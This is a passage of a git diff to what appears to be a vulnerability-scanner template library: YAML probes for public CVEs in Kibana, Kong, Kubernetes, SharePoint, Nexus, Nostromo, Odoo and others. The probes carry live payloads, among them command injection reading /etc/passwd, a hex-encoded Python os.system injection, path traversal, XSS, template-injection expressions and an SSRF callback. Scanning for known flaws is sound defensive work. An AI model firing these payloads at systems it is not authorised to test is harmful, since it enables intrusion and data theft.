api/jolokia/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}read?mimeType=text/html + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeader", "text/html") +references: + - https://www.cvebase.com/cve/2018/1000129 diff --git a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml new file mode 100644 index 0000000..9fa12a2 --- /dev/null +++ b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-7609 +info: + name: Kibana Timelion Code Execution + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + api/timelion/run +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}" + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "seriesList") && StringSearch("resHeaders", "Content-Type: application/json") + +references: + - https://www.cvebase.com/cve/2019/7609 diff --git a/cves/kong-api-improper-authorization-cve-2020-11710.yaml b/cves/kong-api-improper-authorization-cve-2020-11710.yaml new file mode 100644 index 0000000..0931e98 --- /dev/null +++ b/cves/kong-api-improper-authorization-cve-2020-11710.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-11710 +info: + name: Kong API Improper Authorization + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + status +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && (StringSearch("resBody", "kong_env") || StringSearch("resBody", "kong_db_cache_miss")) + +references: + - https://www.cvebase.com/cve/2020/11710 diff --git a/cves/kong-cve-2020-11710 copy.yaml b/cves/kong-cve-2020-11710 copy.yaml deleted file mode 100644 index 20e4a70..0000000 --- a/cves/kong-cve-2020-11710 copy.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: kong-cve-2020-11710 -info: - name: Kong Admin API - risk: High - -params: - - root: '{{.BaseURL}}' - -variables: - - end: | - / - /status -requests: - - method: GET - url: >- - {{.root}}{{.end}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "kong_env") - - >- - StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss") - -reference: - - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw \ No newline at end of file diff --git a/cves/kong-cve-2020-11710.yaml b/cves/kong-cve-2020-11710.yaml deleted file mode 100644 index 20e4a70..0000000 --- a/cves/kong-cve-2020-11710.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: kong-cve-2020-11710 -info: - name: Kong Admin API - risk: High - -params: - - root: '{{.BaseURL}}' - -variables: - - end: | - / - /status -requests: - - method: GET - url: >- - {{.root}}{{.end}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "kong_env") - - >- - StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss") - -reference: - - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw \ No newline at end of file diff --git a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml new file mode 100644 index 0000000..7ee4fa1 --- /dev/null +++ b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-11248 +info: + name: Kubelet PProf Exposed + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + debug/pprof/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "Types of profiles available:") || StringSearch("resBody", "Profile Descriptions") +references: + - https://www.cvebase.com/cve/2019/11248 diff --git a/cves/kubernetes-improper-authentication-cve-2018-18264.yaml b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml new file mode 100644 index 0000000..a267044 --- /dev/null +++ b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml @@ -0,0 +1,23 @@ +id: CVE-2018-18264 +info: + name: Kubernetes Improper Authentication + risk: High + +params: + - root: '{{.BaseURL}}' + + +variables: + - endpoints: | + /api/v1/ + /k8s/api/v1/ +requests: + - method: GET + redirect: false + url: >- + {{.root}}{{.endpoints}}namespaces/kube-system/secrets/kubernetes-dashboard-certs + detections: + - >- + StatusCode() == 200 && StringSearch("response", "apiVersion") && StringSearch("response", "objectRef") +references: + - https://www.cvebase.com/cve/2018/18264 \ No newline at end of file diff --git a/cves/linuxki-rce-cve-2020-7209.yaml b/cves/linuxki-rce-cve-2020-7209.yaml new file mode 100644 index 0000000..b25b1ac --- /dev/null +++ b/cves/linuxki-rce-cve-2020-7209.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-7209 +info: + name: LinuxKI Toolset RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + linuxki/experimental/vis/kivis.php + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + +references: + - https://www.cvebase.com/cve/2020/7209 diff --git a/cves/lotus-domino-info-leak-cve-2005-2428.yaml b/cves/lotus-domino-info-leak-cve-2005-2428.yaml new file mode 100644 index 0000000..d9cd776 --- /dev/null +++ b/cves/lotus-domino-info-leak-cve-2005-2428.yaml @@ -0,0 +1,21 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino Sensitive Information Leak + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + redirect: false + url: >- + {{.root}}names.nsf/People?OpenView + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && RegexSearch('resBody', '(- + {{.root}}index.php/catalogsearch/advanced/result/?name=e + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 503 && StringSearch("resBody", "Too many connections") + +references: + - https://www.cvebase.com/cve/2020/5777 diff --git a/cves/magento-magmi-xss-cve-2017-7391.yaml b/cves/magento-magmi-xss-cve-2017-7391.yaml new file mode 100644 index 0000000..f928e9b --- /dev/null +++ b/cves/magento-magmi-xss-cve-2017-7391.yaml @@ -0,0 +1,22 @@ +id: CVE-2017-7391 +info: + name: Magento MAGMI XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + magmi/web/ajax_gettime.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '"><') +references: + - https://www.cvebase.com/cve/2017/7391 diff --git a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml new file mode 100644 index 0000000..b486076 --- /dev/null +++ b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-24223 +info: + name: Mara CMS Reflective XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + contact.php +requests: + - method: POST + url: >- + {{.root}}{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", '">') + +references: + - https://www.cvebase.com/cve/2020/24223 diff --git a/cves/mida-eframework-rce-cve-2020-15920.yaml b/cves/mida-eframework-rce-cve-2020-15920.yaml new file mode 100644 index 0000000..7d00c51 --- /dev/null +++ b/cves/mida-eframework-rce-cve-2020-15920.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-15920 +info: + name: Mida eFramework RCE + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + PDC/ajaxreq.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + +references: + - https://www.cvebase.com/cve/2020/15920 diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-cve-2020-15505.yaml similarity index 71% rename from cves/mobileiron-rce-probe.yaml rename to cves/mobileiron-rce-cve-2020-15505.yaml index aedb7b5..965a1b3 100644 --- a/cves/mobileiron-rce-probe.yaml +++ b/cves/mobileiron-rce-cve-2020-15505.yaml @@ -1,6 +1,6 @@ -id: mobileiron-rce-probe +id: CVE-2020-15505 info: - name: Mobileiron RCE Probe CVE-2020-15505 + name: MobileIron RCE risk: Potential params: @@ -10,7 +10,6 @@ params: variables: - endpoint: | /mifs/.;/services/LogService - requests: - method: POST redirect: false @@ -25,7 +24,5 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0 - references: - - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 \ No newline at end of file + - https://www.cvebase.com/cve/2020/15505 \ No newline at end of file diff --git a/cves/ms-sharepoint-rce-cve-2020-1147.yaml b/cves/ms-sharepoint-rce-cve-2020-1147.yaml new file mode 100644 index 0000000..2a97c08 --- /dev/null +++ b/cves/ms-sharepoint-rce-cve-2020-1147.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-1147 +info: + name: Microsoft Sharepoint Server RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + _layouts/15/listform.aspx +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "List does mot exist") && StringSearch("resBody", "It may have been deleted by another user") && (StringSearch("resHeader", "Microsoft-IIS") || StringSearch("resHeader", "X-SharePointHealthScore") ||StringSearch("resHeader", "SharePointError") || StringSearch("resHeader", "SPRequestGuid") || StringSearch("resHeader", "MicrosoftSharePointTeamServices")) +references: + - https://www.cvebase.com/cve/2020/1147 diff --git a/cves/ms-sharepoint-rce-cve-2020-16952.yaml b/cves/ms-sharepoint-rce-cve-2020-16952.yaml new file mode 100644 index 0000000..dfdbb28 --- /dev/null +++ b/cves/ms-sharepoint-rce-cve-2020-16952.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-16952 +info: + name: Microsoft SharePoint RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + (StatusCode() == 200 || StatusCode() == 201) && StringSearch("resHeaders", "MicrosoftSharePointTeamServices") && (RegexSearch("resBody", "15\\.0\\.0\\.(4571|5275|4351|5056)") || RegexSearch("resBody", "16\\.0\\.0\\.(10337|10364|10366)")) + +references: + - https://www.cvebase.com/cve/2020/16952 diff --git a/cves/netsweeper-code-injection-cve-2020-13167.yaml b/cves/netsweeper-code-injection-cve-2020-13167.yaml new file mode 100644 index 0000000..2287608 --- /dev/null +++ b/cves/netsweeper-code-injection-cve-2020-13167.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-13167 +info: + name: Netsweeper WebAdmin Python Code Injection + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + webadmin/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 + {{.root}}{{.endpoint}}out + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Referer: "{{.root}}/webadmin/admin/service_manager_data.php" + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "nonexistent") + +references: + - https://www.cvebase.com/cve/2020/13167 diff --git a/cves/nextjs-disclosure.yaml b/cves/nextjs-disclosure.yaml deleted file mode 100644 index 296ad6e..0000000 --- a/cves/nextjs-disclosure.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: nextjs-disclosure-01 -info: - name: NestJS CVE-2020-5284 - risk: Medium - confidence: Certain - - -params: - - root: '{{.BaseURL}}' - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/_next/static/../server/pages-manifest.json - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && RegexSearch("response", '\{"/_app":".*?_app\.js"') - - >- - StatusCode() == 200 && StringSearch("response", "application/json") && StringSearch("response", 'typography') && StringSearch("response", 'collection') diff --git a/cves/nextjs-path-traversal-cve-2020-5284.yaml b/cves/nextjs-path-traversal-cve-2020-5284.yaml new file mode 100644 index 0000000..dd55d9b --- /dev/null +++ b/cves/nextjs-path-traversal-cve-2020-5284.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-5284 +info: + name: Next.js Path Traversal + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + _next/static/ + +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resHeaders", 'application/json') && RegexSearch("resBody", '\{"/_app":".*?_app\.js"') + +references: + - https://www.cvebase.com/cve/2020/5284 diff --git a/cves/nexus-cve-2019-7238.yaml b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml similarity index 98% rename from cves/nexus-cve-2019-7238.yaml rename to cves/nexus-repository-manager-rce-cve-2019-7238.yaml index 68a1998..bf947f2 100644 --- a/cves/nexus-cve-2019-7238.yaml +++ b/cves/nexus-repository-manager-rce-cve-2019-7238.yaml @@ -1,6 +1,6 @@ -id: common-nexus-rce-01 +id: CVE-2019-7238 info: - name: Nexus Repository RCE CVE-2019-7238 + name: Nexus Repository Manager RCE risk: High requests: @@ -19,4 +19,4 @@ requests: reference: - - https://github.com/jas502n/CVE-2019-7238 \ No newline at end of file + - https://www.cvebase.com/cve/2019/7238 \ No newline at end of file diff --git a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml new file mode 100644 index 0000000..83d42d5 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-10199 +info: + name: Nexus Repository Manager RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + rest/beta/repositories/go/group +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Content-Type: application/json + body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}' + detections: + - >- + StatusCode() == 400 && StringSearch("resBody", "1787569") + +references: + - https://www.cvebase.com/cve/2020/10199 diff --git a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml new file mode 100644 index 0000000..4e0bb69 --- /dev/null +++ b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-10204 +info: + name: Nexus Repository Manager RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + extdirect +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}' + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "1787569") + +references: + - https://www.cvebase.com/cve/2020/10204 diff --git a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml new file mode 100644 index 0000000..37fc18a --- /dev/null +++ b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml @@ -0,0 +1,23 @@ +id: CVE-2017-7529 +info: + name: Nginx Remote Integer Overflow + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + - Range: bytes=-17208,-9223372036854758792 + + detections: + - >- + StatusCode() == 206 && StringSearch("resHeaders", "Server: nginx") && StringSearch("resBody", "Content-Range") +references: + - https://www.cvebase.com/cve/2017/7529 diff --git a/cves/nodejs-path-traversal-cve-2017-14849.yaml b/cves/nodejs-path-traversal-cve-2017-14849.yaml new file mode 100644 index 0000000..78d7f51 --- /dev/null +++ b/cves/nodejs-path-traversal-cve-2017-14849.yaml @@ -0,0 +1,22 @@ +id: CVE-2017-14849 +info: + name: Node.js Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + static/../../../a/../../../.. +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2017/14849 diff --git a/cves/nodejs-path-traversal-cve-2018-3714.yaml b/cves/nodejs-path-traversal-cve-2018-3714.yaml new file mode 100644 index 0000000..fcc6e56 --- /dev/null +++ b/cves/nodejs-path-traversal-cve-2018-3714.yaml @@ -0,0 +1,22 @@ +id: CVE-2018-3714 +info: + name: Node.js Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + node_modules/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}../../../../../etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2018/3714 diff --git a/cves/nostromo-rce-cve-2019-16278.yaml b/cves/nostromo-rce-cve-2019-16278.yaml new file mode 100644 index 0000000..77f3935 --- /dev/null +++ b/cves/nostromo-rce-cve-2019-16278.yaml @@ -0,0 +1,23 @@ +id: CVE-2019-16278 +info: + name: Nostromo RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: POST + url: >- + {{.root}}.%0d./.%0d./.%0d./.%0d./bin/sh + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: >- + echo + echo + cat /etc/passwd 2>&1 + detections: + - >- + RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/16278 diff --git a/cves/nuxeo-ssti-cve-2018-16341.yaml b/cves/nuxeo-ssti-cve-2018-16341.yaml new file mode 100644 index 0000000..8e9da37 --- /dev/null +++ b/cves/nuxeo-ssti-cve-2018-16341.yaml @@ -0,0 +1,21 @@ +id: CVE-2018-16341 +info: + name: Nuxeo SSTI + risk: High + +params: + - root: "{{.BaseURL}}" + +requests: + - method: GET + redirect: false + url: >- + {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135") + +references: + - https://www.cvebase.com/cve/2018/16341 diff --git a/cves/odoo-lfi-cve-2018-15640.yaml b/cves/odoo-lfi-cve-2018-15640.yaml new file mode 100644 index 0000000..556bb12 --- /dev/null +++ b/cves/odoo-lfi-cve-2018-15640.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-15640 +info: + name: Odoo LFI + risk: High + +params: + - root: "{{.BaseURL}}" + +variables: + - endpoint: | + /base_import/static/c:/windows/win.ini + /web/static/c:/windows/win.ini + /base/static/c:/windows/win.ini + +requests: + - method: GET + redirect: false + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - X-Requested-With: XMLHttpRequest + - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 + - Accept-Encoding: gzip, deflate + detections: + - >- + StatusCode() == 200 && StringSearch("body", "for 16-bit app support") && StringSearch("body", "[fonts]") + +references: + - https://www.cvebase.com/cve/2018/15640 diff --git a/cves/olimpoks-xss-cve-2020-16270.yaml b/cves/olimpoks-xss-cve-2020-16270.yaml new file mode 100644 index 0000000..c9460f8 --- /dev/null +++ b/cves/olimpoks-xss-cve-2020-16270.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-16270 +info: + name: Olimpoks XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + Auth/Admin +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/ + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "12947g147") + +references: + - https://www.cvebase.com/cve/2019/16270 diff --git a/cves/openfire-ssrf-cve-2019-18394.yaml b/cves/openfire-ssrf-cve-2019-18394.yaml new file mode 100644 index 0000000..cc7ec96 --- /dev/null +++ b/cves/openfire-ssrf-cve-2019-18394.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-18394 +info: + name: OpenFire SSRF + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + getFavicon +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?host=burpcollaborator.net + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StringSearch("resBody", "

Burp Collaborator Server

") +references: + - https://www.cvebase.com/cve/2019/18394 diff --git a/cves/openfire-ssrf.yaml b/cves/openfire-ssrf.yaml deleted file mode 100644 index 7412145..0000000 --- a/cves/openfire-ssrf.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: openfire-ssrf -info: - name: Openfire SSRF (CVE-2019-18394) - risk: Medium - -params: - - root: "{{.BaseURL}}" - - dest: "vvu8gyyr70izifx81a5iuc4gj7pzdo.burpcollaborator.net" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/getFavicon?host={{.dest}} - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && RegexSearch("body", "(?m)\\\\[a-z0-9]+") - -references: - - link: https://swarm.ptsecurity.com/openfire-admin-console/ \ No newline at end of file diff --git a/cves/openproject-sqli.yaml b/cves/openproject-sqli-cve-2019-11600.yaml similarity index 81% rename from cves/openproject-sqli.yaml rename to cves/openproject-sqli-cve-2019-11600.yaml index 3a6f384..60a4b17 100644 --- a/cves/openproject-sqli.yaml +++ b/cves/openproject-sqli-cve-2019-11600.yaml @@ -1,7 +1,7 @@ -id: cve-01-05 +id: CVE-2019-11600 type: list info: - name: OpenProject SQLi CVE-2019-11600 + name: OpenProject SQLi risk: Critical origin: @@ -29,5 +29,4 @@ requests: Math.abs(ResponeTime() > OriginResponeTime()) > 3 reference: - - link: https://www.exploit-db.com/exploits/46838 - - affected version: OpenProject 5.0.0 - 8.3.1 - SQL Injection \ No newline at end of file + - https://www.cvebase.com/cve/2019/11600 \ No newline at end of file diff --git a/cves/openschool-xss-cve-2019-14696.yaml b/cves/openschool-xss-cve-2019-14696.yaml new file mode 100644 index 0000000..2cebed1 --- /dev/null +++ b/cves/openschool-xss-cve-2019-14696.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-14696 +info: + name: Open-School XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + index.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") +references: + - https://www.cvebase.com/cve/2019/14696 diff --git a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml new file mode 100644 index 0000000..5defa11 --- /dev/null +++ b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-2588 +info: + name: Oracle Business Intelligence Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + xmlpserver/servlet/adfresource +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "for 16-bit app support") +references: + - https://www.cvebase.com/cve/2019/2588 diff --git a/cves/iplanet-disclosure.yaml b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml similarity index 78% rename from cves/iplanet-disclosure.yaml rename to cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml index 26e2d8b..0d401ce 100644 --- a/cves/iplanet-disclosure.yaml +++ b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml @@ -1,6 +1,6 @@ -id: iplanet-unauth-01 +id: CVE-2020-9315 info: - name: Oracle iPlanet unauth access + name: Oracle iPlanet Improper Authorization risk: High params: @@ -10,7 +10,6 @@ variables: - endpoint: | /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 